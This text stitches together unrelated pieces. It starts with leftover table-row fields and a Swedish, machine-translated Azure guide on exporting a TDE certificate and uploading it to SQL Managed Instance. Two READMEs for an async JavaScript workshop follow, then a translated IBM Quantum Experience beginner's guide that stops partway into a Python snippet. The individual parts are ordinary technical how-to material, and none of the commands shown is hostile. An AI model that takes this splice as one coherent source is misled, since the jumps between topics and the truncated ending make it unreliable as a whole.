] | null | null | null | articles/azure-sql/managed-instance/tde-certificate-migrate.md | andreasahlund/azure-docs.sv-se | 00cec92906c1c97e2a9aca9c48c51082b3cbb69d | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Migrera TDE-certifikat – hanterad instans
description: Migrera ett certifikat som skyddar databas krypterings nyckeln för en databas med transparent datakryptering till Azure SQL-hanterad instans
services: sql-database
ms.service: sql-managed-instance
ms.subservice: security
ms.custom: sqldbrb=1, devx-track-azurecli
ms.devlang: ''
ms.topic: how-to
author: MladjoA
ms.author: mlandzic
ms.reviewer: sstein, jovanpop
ms.date: 07/21/2020
ms.openlocfilehash: 80ff16156348db9c3a209757b48b7d54615d9104
ms.sourcegitcommit: 400f473e8aa6301539179d4b320ffbe7dfae42fe
ms.translationtype: MT
ms.contentlocale: sv-SE
ms.lasthandoff: 10/28/2020
ms.locfileid: "92790703"
---
# <a name="migrate-a-certificate-of-a-tde-protected-database-to-azure-sql-managed-instance"></a>Migrera ett certifikat för en TDE-skyddad databas till en Azure SQL-hanterad instans
[!INCLUDE[appliesto-sqlmi](../includes/appliesto-sqlmi.md)]
När du migrerar en databas som skyddas av [Transparent datakryptering (TDE)](/sql/relational-databases/security/encryption/transparent-data-encryption) till en Azure SQL-hanterad instans med hjälp av det interna återställnings alternativet måste motsvarande certifikat från SQL Server-instansen migreras innan databasen återställs. Den här artikeln vägleder dig genom processen för manuell migrering av certifikatet till den Azure SQL-hanterade instansen:
> [!div class="checklist"]
>
> * Exportera certifikatet till en personlig information Exchange-fil (. pfx)
> * Extrahera certifikatet från en fil till en Base-64-sträng
> * Ladda upp den med en PowerShell-cmdlet
Ett alternativt alternativ som använder en fullständigt hanterad tjänst för sömlös migrering av både en TDE-skyddad databas och ett motsvarande certifikat finns i [så här migrerar du din lokala databas till Azure SQL-hanterad instans med hjälp av Azure Database migration service](../../dms/tutorial-sql-server-to-managed-instance.md).
> [!IMPORTANT]
> Ett migrerat certifikat används endast för återställning av den TDE-skyddade databasen. Snart när återställningen är färdig ersätts det migrerade certifikatet av ett annat skydd, antingen ett tjänst hanterat certifikat eller en asymmetrisk nyckel från nyckel valvet, beroende på vilken typ av TDE som du har angett på instansen.
## <a name="prerequisites"></a>Förutsättningar
Du behöver följande för att slutföra stegen i den här artikeln:
* [Pvk2Pfx](/windows-hardware/drivers/devtest/pvk2pfx)-kommandoradsverktyget installerat på den lokala servern eller en annan dator med åtkomst till det certifikat som exporterats som en fil. Verktyget Pvk2Pfx är en del av [Enterprise Windows Driver Kit](/windows-hardware/drivers/download-the-wdk), en fristående kommando rads miljö.
* [Windows PowerShell](/powershell/scripting/install/installing-windows-powershell) version 5.0 eller senare installerat.
# <a name="powershell"></a>[PowerShell](#tab/azure-powershell)
Se till att du har följande:
* Azure PowerShell-modulen [installeras och uppdateras](/powershell/azure/install-az-ps).
* [AZ. SQL-modul](https://www.powershellgallery.com/packages/Az.Sql).
[!INCLUDE [updated-for-az](../../../includes/updated-for-az.md)]
> [!IMPORTANT]
> PowerShell Azure Resource Manager-modulen stöds fortfarande av Azure SQL-hanterad instans, men all framtida utveckling gäller AZ. SQL-modulen. De här cmdletarna finns i [AzureRM. SQL](/powershell/module/AzureRM.Sql/). Argumenten för kommandona i AZ-modulen och i AzureRM-modulerna är i stort sett identiska.
Kör följande kommandon i PowerShell för att installera/uppdatera modulen:
```azurepowershell
Install-Module -Name Az.Sql
Update-Module -Name Az.Sql
```
# <a name="azure-cli"></a>[Azure CLI](#tab/azure-cli)
Om du behöver installera eller uppgradera kan du läsa informationen i [Installera Azure CLI](/cli/azure/install-azure-cli).
* * *
## <a name="export-the-tde-certificate-to-a-pfx-file"></a>Exportera TDE-certifikatet till en PFX-fil
Certifikatet kan exporteras direkt från käll SQL Servers instansen eller från certifikat arkivet om det finns där.
### <a name="export-the-certificate-from-the-source-sql-server-instance"></a>Exportera certifikatet från käll SQL Servers instansen
Använd följande steg för att exportera certifikatet med SQL Server Management Studio och konvertera det till. PFX-format. De generiska namnen *TDE_Cert* och *full_path* används för certifikat-och fil namn och sökvägar genom stegen. De ska ersättas med de faktiska namnen.
1. Öppna ett nytt frågefönster i SSMS och Anslut till käll SQL Servers instansen.
1. Använd följande skript för att visa en lista över TDE-skyddade databaser och hämta namnet på certifikatet som skyddar krypteringen av databasen som ska migreras:
```sql
USE master
GO
SELECT db.name as [database_name], cer.name as [certificate_name]
FROM sys.dm_database_encryption_keys dek
LEFT JOIN sys.certificates cer
ON dek.encryptor_thumbprint = cer.thumbprint
INNER JOIN sys.databases db
ON dek.database_id = db.database_id
WHERE dek.encryption_state = 3
```

1. Kör följande skript för att exportera certifikatet till ett par filer (.cer och .pvk) med informationen för den offentliga nyckeln och den privata nyckeln:
```sql
USE master
GO
BACKUP CERTIFICATE TDE_Cert
TO FILE = 'c:\full_path\TDE_Cert.cer'
WITH PRIVATE KEY (
FILE = 'c:\full_path\TDE_Cert.pvk',
ENCRYPTION BY PASSWORD = '<SomeStrongPassword>'
)
```

1. Använd PowerShell-konsolen för att kopiera certifikat information från ett par med nyligen skapade filer till en. pfx-fil med hjälp av Pvk2Pfx-verktyget:
```cmd
.\pvk2pfx -pvk c:/full_path/TDE_Cert.pvk -pi "<SomeStrongPassword>" -spc c:/full_path/TDE_Cert.cer -pfx c:/full_path/TDE_Cert.pfx
```
### <a name="export-the-certificate-from-a-certificate-store"></a>Exportera certifikatet från ett certifikat Arkiv
Om certifikatet sparas i den SQL Server lokala datorns certifikat Arkiv, kan det exporteras med följande steg:
1. Öppna PowerShell-konsolen och kör följande kommando för att öppna snapin-modulen certifikat i Microsoft Management Console:
```cmd
certlm
```
2. I MMC-snapin-modulen certifikat expanderar du sökvägen personliga > certifikat för att se listan över certifikat.
3. Högerklicka på certifikatet och klicka på **Exportera** .
4. Följ guiden för att exportera certifikatet och den privata nyckeln till ett. PFX-format.
## <a name="upload-the-certificate-to-azure-sql-managed-instance-using-an-azure-powershell-cmdlet"></a>Överför certifikatet till den Azure SQL-hanterade instansen med hjälp av en Azure PowerShell-cmdlet
# <a name="powershell"></a>[PowerShell](#tab/azure-powershell)
1. Börja med förberedelsestegen i PowerShell:
```azurepowershell
# import the module into the PowerShell session
Import-Module Az
# connect to Azure with an interactive dialog for sign-in
Connect-AzAccount
# list subscriptions available and copy id of the subscription target the managed instance belongs to
Get-AzSubscription
# set subscription for the session
Select-AzSubscription <subscriptionId>
```
2. När alla förberedelse steg har utförts kör du följande kommandon för att ladda upp det Base-64-kodade certifikatet till den hanterade mål instansen:
```azurepowershell
$fileContentBytes = Get-Content 'C:/full_path/TDE_Cert.pfx' -AsByteStream
$base64EncodedCert = [System.Convert]::ToBase64String($fileContentBytes)
$securePrivateBlob = $base64EncodedCert | ConvertTo-SecureString -AsPlainText -Force
$password = "<password>"
$securePassword = $password | ConvertTo-SecureString -AsPlainText -Force
Add-AzSqlManagedInstanceTransparentDataEncryptionCertificate -ResourceGroupName "<resourceGroupName>" `
-ManagedInstanceName "<managedInstanceName>" -PrivateBlob $securePrivateBlob -Password $securePassword
```
# <a name="azure-cli"></a>[Azure CLI](#tab/azure-cli)
Du måste först [Konfigurera ett Azure Key Vault](../../key-vault/general/manage-with-cli2.md) med din *. pfx* -fil.
1. Börja med förberedelsestegen i PowerShell:
```azurecli
# connect to Azure with an interactive dialog for sign-in
az login
# list subscriptions available and copy id of the subscription target the managed instance belongs to
az account list
# set subscription for the session
az account set --subscription <subscriptionId>
```
1. När alla förberedelse steg har utförts kör du följande kommandon för att ladda upp det grundläggande 64-kodade certifikatet till den hanterade mål instansen:
```azurecli
az sql mi tde-key set --server-key-type AzureKeyVault --kid "<keyVaultId>" `
--managed-instance "<managedInstanceName>" --resource-group "<resourceGroupName>"
```
* * *
Certifikatet är nu tillgängligt för den angivna hanterade instansen och säkerhets kopieringen av motsvarande TDE-skyddade databas kan återställas.
## <a name="next-steps"></a>Nästa steg
I den här artikeln har du lärt dig hur du migrerar ett certifikat som skyddar krypterings nyckeln för en databas med transparent datakryptering, från den lokala eller IaaS SQL Server-instansen till en Azure SQL-hanterad instans.
Se [återställa en databas säkerhets kopia till en hanterad Azure SQL-instans](restore-sample-database-quickstart.md) för att lära dig hur du återställer en databas säkerhets kopia till en Azure SQL-hanterad instans. | 49.559585 | 455 | 0.778986 | swe_Latn | 0.983008 |
# async-you
# Async Workshop
This workshop has you implement various asynchronous utility functions.
* [Parallel](https://caolan.github.io/async/v3/docs.html#parallel)
* [map](https://caolan.github.io/async/v3/docs.html#map)
* [waterfall](https://caolan.github.io/async/v3/docs.html#waterfall)
To complete the workshop, simply fill out the functions in `src/async.js` such that the tests in `spec/async-spec.js` all pass.
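For a sense of what you'll be building, here is one possible vanilla-JavaScript sketch of the `parallel` utility. This is not the official solution — your version must satisfy whatever `spec/async-spec.js` actually checks — but it shows the shape of the problem:

```javascript
// Run an array of async tasks concurrently; each task receives a
// node-style callback (err, result). When all tasks finish, `done`
// is called with the results in the same order as the tasks.
function parallel(tasks, done) {
  const results = new Array(tasks.length);
  let pending = tasks.length;
  let failed = false;

  if (pending === 0) return done(null, results);

  tasks.forEach((task, i) => {
    task((err, result) => {
      if (failed) return;          // already reported an error
      if (err) {
        failed = true;
        return done(err);          // fail fast on the first error
      }
      results[i] = result;         // keep task order, not finish order
      if (--pending === 0) done(null, results);
    });
  });
}

// Example: both tasks run concurrently; results keep task order.
parallel(
  [
    (cb) => setTimeout(() => cb(null, 'one'), 20),
    (cb) => setTimeout(() => cb(null, 'two'), 5),
  ],
  (err, results) => {
    if (err) throw err;
    console.log(results); // [ 'one', 'two' ]
  }
);
```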
You may have CORS issues when trying to run the specs. To get around this, you need to create a server that can serve the files.
In the root directory of the project run one of the following commands:
For python 2, run `python -m SimpleHTTPServer`
For python 3, run `python -m http.server`
Now in your browser, go to `http://localhost:8000/SpecRunner.html?random=false` to run the tests.
Note, your python server may use a different port, for example port 8080 instead of 8000. Adjust the url above so it uses the correct port.
**I see you**
[](https://nodei.co/npm/async-you/) [](https://nodei.co/npm/async-you/)
## Introduction
Learn to use the popular package [async](https://github.com/caolan/async) via this interactive workshop.
Hopefully by the end of this workshop you will understand the main functions that _async_ provides.
## Installation
1. Install [Node.js](http://nodejs.org/)
2. Run `npm install async`
3. Run `npm install async-you -g`; use `sudo` if you have permission issues.
4. Run `async-you` to start the program!
## Usage
#### 1. Selecting a problem to work on
Once the workshop is installed, run `async-you` to print a menu
where you can select a problem to work on.
```
$ async-you
```
Problems are listed in rough order of difficulty. You are advised to complete them in order, as later problems
will build on skills developed by solving previous problems.
#### 2. Writing your solution
Once you have selected a problem, the workshop will remember which problem you are working on.
Using your preferred editor, simply create a file to write your solution in.
#### 3. Testing your solution
Use the workshop's `run` command to point the workshop at your solution file. Your solution will be loaded
and passed the problem input. This usually won't perform any validation; it will only show the program output.
```
$ async-you run mysolution.js
```
#### 4. Verifying your solution
Your solution will be verified against the output of the 'official' solution.
If all of the output matches, then you have successfully solved the problem!
```
$ async-you verify mysolution.js
```
## Stuck?
Feedback and criticism are welcome; please log your troubles in [issues](https://github.com/bulkan/async-you).
## Resources
## Thanks rvagg
This tutorial was built using rvagg's [workshopper](https://github.com/rvagg/workshopper) framework.
## Licence
MIT
# Beginner's Guide
- Introduction
- Getting Started
- Histogram Representation (Bar Graph)
- The Weird and Wonderful World of the Qubit
- Single-Qubit Gates
- Creating Superposition
- Introducing Qubit Phase
- Summary of Quantum Gates
- Multi-Qubit Gates
- Entanglement
- Bell and GHZ Tests
- Bell and GHZ Tests (Cont.)
- Results from the GHZ Test in the Quantum Experience
## [Introduction](https://quantumexperience.ng.bluemix.net/qx/tutorial?sectionId=beginners-guide&page=002-Introduction~2F001-Introduction)
We are at the beginning of a new stage of the information revolution. The first stage began around 1950, with expensive, room-sized computers used only by experts. Today there are more computers than people in the world, and almost everything we do, from communication to transportation, commerce, and the internet, depends on computers. All of our computers' capabilities come from manipulating 0s and 1s with simple operations such as AND, OR, and NOT, also known as logic gates. Performing these operations billions of times per second in billions of places keeps the world running in the way we take for granted.
For 35 years, IBM has been studying a completely different way of representing and processing information, as different from ordinary "classical" information as the dreams in a book. Unlike dreams, this new kind of information, called quantum information, is both easy to understand and useful. The basic unit of quantum information is the **qubit** (pronounced CUE-bit), and a machine that stores and processes qubits is called a **quantum computer**. Over the years we have built and tested increasingly powerful quantum computers, and last year we installed a 5-qubit quantum computer in our Yorktown lab and made it available to the public over the internet. In other words, you now have a programmable quantum computer at your fingertips. We will soon upgrade our public quantum computer, but even five qubits are enough to do quantum computation.
Quantum theory was developed in the early twentieth century and revolutionized physics and chemistry by successfully explaining the strange behavior of tiny particles such as atoms and electrons. In the late twentieth century it was discovered that quantum theory applies not only to these particles but to information itself. This led to a revolution in the science and technology of information processing, opening the door to new kinds of computation and communication.
Through this Beginner's Guide, we hope you will come to understand what makes quantum computing different and the new possibilities it opens up. These may include designing new materials and drugs, faster database search, and solving systems of linear equations with astonishing efficiency in ways that are currently impossible. To do all this, quantum computers will use two fundamental properties of the quantum world: **superposition** and **entanglement**.
So, what is **superposition**? A qubit can be in the $\lvert 0 \rangle$ state, the $\lvert 1 \rangle$ state, or a linear combination (superposition) of the two. Unlike the usual notation for bits, the half-bracket notation (Dirac notation) $\lvert \rangle$ is a convenient way to denote qubit states. When you measure the $\lvert 0 \rangle$ state you get a classical 0, and when you measure the $\lvert 1 \rangle$ state you get a classical 1. In many physical implementations of quantum computing, including ours, the $\lvert 0 \rangle$ state is sometimes called the ground state because it is the lowest-energy state.
Now for **entanglement**. Entanglement is a property of many quantum superpositions and has no classical analog. In an entangled state, the whole system can be described definitively, even though its parts cannot. Observing one of two entangled qubits causes it to behave randomly, but tells the observer exactly how the other qubit would behave if observed in the same way. Entanglement involves a correlation between the individually random behaviors of the two qubits, so it cannot be used to send a message. Some call this "instantaneous action at a distance," but that is a misnomer: there is no action here, only correlation; the correlation between the two qubits' outcomes can only be detected by comparing the results after both measurements are made. The ability of quantum computers to exist in entangled states is the main reason for their extra computational power, and for many other features of quantum information processing that cannot be performed, or even described, classically.
To learn more about the concepts of superposition and entanglement, watch the [video](https://www.youtube.com/watch?v=Hi0BzqV_b44) of actor Paul Rudd defeating Stephen Hawking in a game of quantum chess. The rules of the game are [here](https://www.youtube.com/watch?v=jJoDKHKE2gA), and you can also [watch](https://www.youtube.com/watch?v=LikdmXfWO2A&t=24s) the game's inventor, Chris Cantwell, play a friendly match against chess master Anna Rudolf.
If you want to learn more about the math and theory behind these concepts, we encourage you to dive into our full user guide.
## [Getting Started](https://quantumexperience.ng.bluemix.net/qx/tutorial?sectionId=beginners-guide&page=003-Getting_Started~2F001-Getting_Started)
The **Quantum Composer** is a graphical user interface for programming a quantum processor. Think of it as a tool for building quantum algorithms from a defined set of measurements and gates (operations that change the state of qubits).
Through this guide you will try many different experiments (and you can also explore on your own). When you first click the "Composer" tab, you will name your experiment and choose whether to run it on a real quantum processor or on a custom quantum processor (a simulator). If you choose custom, you need to select the number of qubits in the experiment and the number of bits in the classical register (you can keep it the same as the number of qubits). On a real quantum processor, the possible connections between qubits are limited by the experimental setup, and there is some error in the measurements due to experimental imperfections. On a simulated quantum processor, gates can be placed anywhere. Although there are no experimental errors, you will still see random outcomes, due to the nature of quantum information. In this guide we show results from running experiments on the simulated processor (to avoid confusing you with bias from experimental error). We recommend that you run some experiments on both the custom and the real processors to get a sense of the difference.
The Composer lets you create a quantum score: not a score in the athletic sense, but in the musical sense. In a quantum score, as in music, time runs from left to right. Each line represents a qubit (and the changes that happen to that qubit over time). Like musical notes, each qubit has a different frequency. A quantum algorithm (circuit) first prepares the qubits' states (for example, "$\lvert 0 \rangle$" in the image below), and then executes a series of one- and two-qubit gates in time order from left to right.

Quantum gates are represented by boxes; they play frequencies of different lengths, amplitudes, and phases. These are called single-qubit gates. To apply a gate to a qubit, simply drag the gate onto the qubit's line. Double-click a box, or drag it to the trash, to delete it.
Once you have filled the score with the desired gates and measurements, click "Run" (only available on the real processor) or "Simulate" to generate the results of the experiment. Every circuit must end with a measurement gate in order to run.
**Single-qubit measurement:**

In the example above, we created a score with a single qubit and one classical bit in the register. We measured qubit "0" and stored the measurement result in position 0 of the classical bit register (the line labeled "c" below the score).
After a quantum measurement is performed, the qubit's information becomes a classical bit, which means it loses the quantum properties of superposition and entanglement. In a measurement, each qubit takes the value 0, meaning the qubit was measured in the $\lvert 0 \rangle$ state, or 1, meaning the qubit was measured in the $\lvert 1 \rangle$ state. Sometimes your qubit has the same probability of being $\lvert 0 \rangle$ or $\lvert 1 \rangle$, for example when it is in an equal superposition. In that case, when you repeat the experiment many times on the real device (the number of repetitions is called "shots" in the Simulate drop-down menu, e.g. 1024), you will find that about half the time you measure 0 and the other half you measure 1.
In the IBM Q Experience, the results of your quantum score are displayed in a standard histogram/bar-graph representation.
## [Histogram Representation (Bar Graph)](https://quantumexperience.ng.bluemix.net/qx/tutorial?sectionId=beginners-guide&page=003-Getting_Started~2F002-Histogram_representation_(Bar_graph))
In the histogram/bar-graph representation, the string of 0s and 1s under each bar represents the measured qubit state, and the height of the bar represents the frequency with which that outcome occurred across the repeated experiments. Note that the more qubits you use, the more 0s and 1s are needed to represent the results. To save space, outcomes that never occur are omitted from the histogram, and some low-frequency outcomes may be grouped into a bar labeled "other values."
**3-qubit measurement, ground state**


**3-qubit measurement, equal superposition**


## [The Weird and Wonderful World of the Qubit](https://quantumexperience.ng.bluemix.net/qx/tutorial?sectionId=beginners-guide&page=004-The_Weird_and_Wonderful_World_of_the_Qubit~2F001-The_Weird_and_Wonderful_World_of_the_Qubit)
A qubit is a quantum system composed of two energy levels, labeled $\lvert 0 \rangle$ and $\lvert 1\rangle$. The $\lvert 0 \rangle$ state is often called the ground state because it is the lower of the two energies. Together, $\lvert 0 \rangle$ and $\lvert 1 \rangle$ form the so-called "standard basis vectors." Like all vectors, they point in a direction and have a magnitude. Defining basis vectors is a very useful trick borrowed from linear algebra: once these vectors are defined, any other vector can be constructed as a linear combination of the basis vectors.
A qubit also has a "phase," which arises because superpositions can be complex. To represent these superposition states, we attach coefficients $a$ and $b$ to the states, as in $a \lvert 0 \rangle + b \lvert 1 \rangle$. This formula says: "the state is a linear combination of $\lvert 0 \rangle$ and $\lvert 1 \rangle$, where the contribution of each part is set by the coefficients $a$ and $b$." The coefficients $a$ and $b$ can be positive, negative, or even complex. If we take the absolute value of $a$ or $b$ and square it (i.e., $\lvert a \rvert ^ 2$ or $\lvert b \rvert ^ 2$), we obtain the probability of measuring the outcome 0 or 1, respectively.
The basis states $\lvert 0 \rangle$ and $\lvert 1 \rangle$, together with their linear combinations $a \lvert 0 \rangle + b \lvert 1 \rangle$, describe the state of a single qubit. But because the coefficients $a$ and $b$ are not merely real numbers, and can be imaginary or complex, visualizing a qubit requires a special tool called the **Bloch sphere**. The Bloch sphere is a sphere of radius 1, and each point on its surface represents the state of one qubit. Just as the Earth uses longitude and latitude to describe points on its surface, the Bloch sphere can use angles to describe the state of a qubit. This representation can express any single-qubit state, including those with complex coefficients. Points on the surface of the Bloch sphere along the X, Y, or Z axis correspond to the special states described below.

The quantum state is represented by the orange line in the figure. The state at the top of the sphere is $\lvert 0 \rangle$, and the state at the bottom is $\lvert 1 \rangle$.
When a qubit is in a superposition of $\lvert 0 \rangle$ and $\lvert 1 \rangle$, the vector points somewhere between these two points (that is, the angle $\theta$ is between 0 and 180 degrees, or $\pi$ radians).
There is one more degree of freedom on the sphere: rotation about the Z axis, described by the angle $\phi$. When $\phi$ is nonzero, the qubit's phase has changed. The Bloch sphere picture can only represent a single qubit. For the purposes of these diagrams, we assume the length of the Bloch vector equals the radius of the Bloch sphere.
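The two angles $\theta$ and $\phi$ fully parametrize a single-qubit state as $\cos(\theta/2)\lvert 0 \rangle + e^{i\phi}\sin(\theta/2)\lvert 1 \rangle$. The small sketch below (not part of the original guide; plain Python, no quantum libraries) makes the correspondence concrete:

```python
import cmath
import math

def bloch_state(theta, phi):
    """Return the amplitudes (a, b) of cos(theta/2)|0> + e^{i phi} sin(theta/2)|1>."""
    a = math.cos(theta / 2)
    b = cmath.exp(1j * phi) * math.sin(theta / 2)
    return a, b

# theta = 0 is the north pole of the Bloch sphere, i.e. |0>
print(bloch_state(0.0, 0.0))   # (1.0, 0j) -> |0>

# theta = pi/2, phi = 0 points along +X: the equal superposition |+>
a, b = bloch_state(math.pi / 2, 0.0)
print(abs(a) ** 2, abs(b) ** 2)   # measurement probabilities, each ≈ 0.5

# Any choice of (theta, phi) gives a normalized state
assert abs(abs(a) ** 2 + abs(b) ** 2 - 1.0) < 1e-12
```

Setting $\phi \neq 0$ only changes the complex phase of the $\lvert 1 \rangle$ amplitude; the measurement probabilities along Z stay the same, which is exactly why a phase change is invisible to a standard Z measurement.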
## [Single-Qubit Gates](https://quantumexperience.ng.bluemix.net/qx/tutorial?sectionId=beginners-guide&page=005-Single-Qubit_Gates~2F001-Single-Qubit_Gates)
Just as a classical computer performs computation by manipulating the bits 0 and 1, we manipulate qubits to perform computation on a quantum computer. In this section we will show you how to use some important single-qubit gates.
To see how these operate mathematically, check out the full user guide.
### The X gate
Let's start with the X gate, often called the "bit flip," because it flips 0 to 1 and vice versa.

It is also called a rotation about the X axis, because it rotates the state vector by $\pi$ radians around the X axis. If you start from $\lvert 0 \rangle$ at the top of the Bloch sphere, the X gate rotates you to the bottom of the sphere ($\lvert 1 \rangle$). See the schematic below, and try the X gate in the Composer using the quantum score shown.



## [Creating Superposition](https://quantumexperience.ng.bluemix.net/qx/tutorial?sectionId=beginners-guide&page=005-Single-Qubit_Gates~2F002-Creating_superposition)
Now that we know how to switch between $\lvert 0 \rangle$ and $\lvert 1 \rangle$, let's explore superposition: the idea of creating a new quantum state composed of the basis states $\lvert 0 \rangle$ and $\lvert 1 \rangle$. To create superposition, we extend our set of gates to include the H gate, represented in the Quantum Composer by a blue square labeled H.

Place the H gate, also called the Hadamard gate, on one of the qubits (which is in the $\lvert 0 \rangle$ state) and then perform a standard measurement. Do you find that the qubit behaves as $\lvert 0 \rangle$ half of the time and as $\lvert 1 \rangle$ the other half? Before the measurement forces the qubit to choose a final state, the qubit's state is neither $\lvert 0 \rangle$ nor $\lvert 1 \rangle$, but a unique quantum state, a superposition, composed of both states with equal weight. The special superposition obtained by applying the H gate to the $\lvert 0 \rangle$ state is defined as $\vert + \rangle = \frac{1}{\sqrt{2}}(\lvert 0 \rangle + \lvert 1 \rangle)$. This new state, which we call $\lvert + \rangle$, gives the outcome 0 with probability 1/2 and the outcome 1 with probability 1/2. You can think of the H gate as a rotation about the X+Z axis, shown by the dashed line in the figure below. This is the standard representation of the superposition state: **it points along the +X axis of the Bloch sphere**.


The histogram below shows the results of running the circuit above 100 times. Although on average we expect this circuit to produce 0 and 1 with equal probability, any finite number of trials is unlikely to produce exactly that result, just as 100 fair coin tosses do not usually produce exactly 50 heads and 50 tails.

Along with $\vert + \rangle$ there is $\vert - \rangle = \frac{1}{\sqrt{2}}(\lvert 0 \rangle - \lvert 1 \rangle)$, the vector pointing along the -X axis of the Bloch sphere; together they define a new basis, called the superposition basis. The $\vert - \rangle$ state is produced by the circuit below. First, the X gate flips $\lvert 0 \rangle$ to $\lvert 1 \rangle$; then the H gate rotates it about the X+Z axis, giving $\vert - \rangle$. When you run this circuit you will find that, as before, the outputs are evenly split. Different states give the same result.



When we measure along the standard Z axis (the only direction we can access through the Z-measurement gate), we cannot obtain the qubit's phase information.
To distinguish the two states, $\vert + \rangle$ and $\vert -\rangle$, we need to measure in the superposition basis. Experimentally, we cannot physically measure along different directions on the Bloch sphere; however, we can make it look as though we changed the measurement by using quantum gates to rotate the qubit's state before performing the standard measurement (which is only along +Z). To measure in the X basis, we rotate the qubit's state vector so that the component originally pointing along the X axis now points along +Z, which is done by adding a Hadamard gate before the measurement.

Measuring $\vert + \rangle$ in the X basis:


Measuring $\vert - \rangle$ in the X basis:

Try the X-basis measurements of the superposition states $\vert + \rangle$ and $\vert -\rangle$ above. You will find that 100% of the outcomes are 0 and 1, respectively. In other words, if we measure in the standard (Z) basis, the result is completely random; but in the X basis, the output is deterministic.
## [Introducing Qubit Phase](https://quantumexperience.ng.bluemix.net/qx/tutorial?sectionId=beginners-guide&page=005-Single-Qubit_Gates~2F005-Introducing_qubit_phase)
Now that we have seen how to create $\lvert 0 \rangle$, $\lvert 1 \rangle$, and superposition states, let's look at how to change the phase of a superposition. We add the following gates: $Z$, $S$, $S^\dagger$, $T$, and $T^\dagger$.

The $Z$ gate is a rotation of $\pi$ radians about the Z axis, the $S$ gate is a rotation of $\frac{\pi}{2}$ radians about the Z axis, and the $T$ gate is a rotation of $\frac{\pi}{4}$ radians about the Z axis. The $S^\dagger$ gate is the inverse of the $S$ gate (a rotation of $-\frac{\pi}{2}$ radians about the Z axis; $SS^\dagger$ returns the original state), and likewise $T^\dagger$ is the inverse of $T$. These rotations give the qubit a component along the Y axis of the Bloch sphere, which represents the complex information in a quantum state.
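As matrices, these rotations about Z are diagonal: $\mathrm{diag}(1, e^{i\alpha})$ for a rotation angle $\alpha$ (up to a global phase). The relations between them, for example that two $S$ gates make a $Z$, can be verified numerically. A sketch in plain Python:

```python
import cmath
import math

def z_rotation(angle):
    """Phase gate diag(1, e^{i*angle}): a rotation of `angle` about the Z axis."""
    return [[1, 0], [0, cmath.exp(1j * angle)]]

Z = z_rotation(math.pi)        # pi rotation
S = z_rotation(math.pi / 2)    # pi/2 rotation
T = z_rotation(math.pi / 4)    # pi/4 rotation

def compose(g1, g2):
    """2x2 matrix product g1 @ g2."""
    return [[sum(g1[i][k] * g2[k][j] for k in range(2)) for j in range(2)]
            for i in range(2)]

def close(g1, g2):
    return all(abs(g1[i][j] - g2[i][j]) < 1e-12 for i in range(2) for j in range(2))

assert close(compose(S, S), Z)   # two S gates make a Z
assert close(compose(T, T), S)   # two T gates make an S

# Z flips |+> to |->: the |1> amplitude picks up a minus sign
s = 1 / math.sqrt(2)
plus = [s, s]
minus = [Z[0][0] * plus[0], Z[1][1] * plus[1]]
print(minus)   # ≈ [0.707, -0.707]
```

Note that none of these gates change the Z-measurement probabilities, which is why the phase is only visible in a superposition-basis measurement.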
When the qubit is in the $\lvert 0 \rangle$ state, the Z gate has no effect. But when the qubit is in the $\lvert + \rangle$ state, you will see that the Z gate flips $\lvert + \rangle$ to $\lvert - \rangle$.
**Z gate: qubit in the $\lvert 0 \rangle$ state**


**Z gate: qubit in the $\lvert + \rangle$ state**


Now let's look at intermediate rotations about the Z axis, starting from the $\lvert + \rangle$ superposition state. The following summarizes how different rotations about the Z axis affect measurement outcomes in the superposition basis.


## [Summary of Quantum Gates](https://quantumexperience.ng.bluemix.net/qx/tutorial?sectionId=beginners-guide&page=005-Single-Qubit_Gates~2F006-Summary_of_quantum_gates)


## [Multi-Qubit Gates](https://quantumexperience.ng.bluemix.net/qx/tutorial?sectionId=beginners-guide&page=006-Multi-Qubit_Gates~2F001-Multi-Qubit_Gates)
States of multiple qubits are written with a notation similar to the one we have been using, just with more digits inside the $\lvert \rangle$ (ket) symbol. On a two-qubit processor, the qubits can be in four possible states: $\lvert 00 \rangle$, $\lvert 01 \rangle$, $\lvert 10 \rangle$, and $\lvert 11 \rangle$. Reading from left to right, the first digit represents the state of the second qubit and the second digit represents the state of the first qubit. In other words: **the first qubit (q0) is always on the far right**. We choose this notation for consistency with classical binary representation. Just like a single qubit, multiple qubits can also be in superposition states, for example $\frac{1}{\sqrt{2}}(\lvert 00 \rangle - \lvert 11 \rangle)$. When this state is measured, the two qubits always have the same value: both 0 half of the time, and both 1 the other half.
To do something interesting and take advantage of the structures of the quantum world, we need gates that perform *conditional* logic between qubits, meaning that the state of one qubit depends on the state of another.
The conditional gate we will use is the Controlled-NOT, abbreviated CNOT. It is represented by the element in the figure below:

When the CNOT gate acts on standard basis states, it flips the target qubit (applies a NOT operation, or X gate) only when the control qubit is $\lvert 1 \rangle$; otherwise it does nothing.
Here is how the CNOT gate transforms the two-qubit basis states (**the first qubit, i.e. the rightmost one, is the control**):

Try the CNOT circuit examples below with different inputs. Drag the CNOT gate onto the target qubit, then click the control qubit to connect the two.
**CNOT (input 00)**

**CNOT (input 01)**

**CNOT (input 10)**

**CNOT (input 11)**

## [Entanglement](https://quantumexperience.ng.bluemix.net/qx/tutorial?sectionId=beginners-guide&page=007-Entanglement~2F001-Entanglement)
We now come to entanglement, the strangest of all quantum phenomena. When two or more quantum objects are entangled, even if they are too far apart to influence one another, their behavior is (1) individually random, yet (2) strongly correlated, in a way that cannot be explained by assuming each object behaves independently of the other.
An entangled state is a state composed of multiple qubits that cannot be written in terms of the individual qubits' states. For example, none of the states $\lvert 00 \rangle$, $\lvert 01 \rangle$, $\lvert 10 \rangle$, and $\lvert 11 \rangle$ is entangled, because each can be described by explicitly giving the state of every qubit. Likewise, $(\lvert 00 \rangle + \lvert 01 \rangle)/\sqrt{2}$ is not entangled, because it can be described as the first qubit being in the single-qubit superposition $(\lvert 0 \rangle + \lvert 1 \rangle)/\sqrt{2}$ while the second qubit is in $\lvert 0 \rangle$. However, $(\lvert 01 \rangle + \lvert 10 \rangle)/\sqrt{2}$ is entangled, because the state of each individual qubit cannot be described separately. When you measure one qubit of this state, along any axis, it behaves randomly, but its random behavior lets you predict exactly how the other qubit behaves under the same measurement. No unentangled state exhibits this combination of perfect individual randomness and perfect correlation.
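A Bell state is usually prepared with an H gate on the control qubit followed by a CNOT; that circuit can be reproduced numerically. A minimal sketch (plain Python; amplitudes are ordered $[\lvert 00 \rangle, \lvert 01 \rangle, \lvert 10 \rangle, \lvert 11 \rangle]$ with q0 on the right, following this guide's convention):

```python
import math

s = 1 / math.sqrt(2)
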